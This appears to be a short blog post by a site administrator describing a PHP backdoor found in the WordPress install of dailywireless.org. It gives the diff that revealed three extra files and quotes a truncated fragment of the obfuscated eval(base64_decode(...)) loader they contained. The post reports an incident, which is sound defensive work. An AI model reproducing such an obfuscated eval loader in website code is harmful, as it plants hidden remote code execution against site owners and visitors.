wordpress hack found

after month or two of living with a backdoor in the wordpress install on dailywireless.org, it has finally been found.

$ diff -r wordpress-2.8.4/ dailywireless.org/ ... Only in dailywireless.org/wp-admin: fonction.php Only in dailywireless.org/wp-admin: wp-conf.php Only in dailywireless.org/wp-admin: wp-links.php

a diff between dailywireless.org's wordpress code and stock 2.8.4 code showed no file differences but did show 3 untracked files. the ones listed above. they contain some highly obfusticated code which looks like

<?php $o="QAAAO29zams5Cg0nJztvgA6RyA68DoSdvYm5gb3M9JzWP8QSRJyU503Cb0AORBKYI2 Wrg0QAHBlRyZQDxvP4HASgNoQCQDnAQgC0oD8eb5TH2CjJS0AKAHTE46AADYGn0E hAoZ2I=";eval(base64_decode("JGxs...

which decodes into the first of numerous layers of base64 encoded php.


once i had some of the code, i could google for it and found other people who have dealt with this kind of invasion before. the best resource I found is an automated web tool to decode the obfustication all the way down to the resultant PHP.

fonction.php decodes to this, and wp-conf.php decodes to this. wp-links.php was identical to wp-conf.php.

the backdoor was probably placed before the 2.8.4 upgrade using some older security hole. the backdoor remained after the 2.8.4 upgrade because the upgrade doesnt check for files that are outside the WP codebase.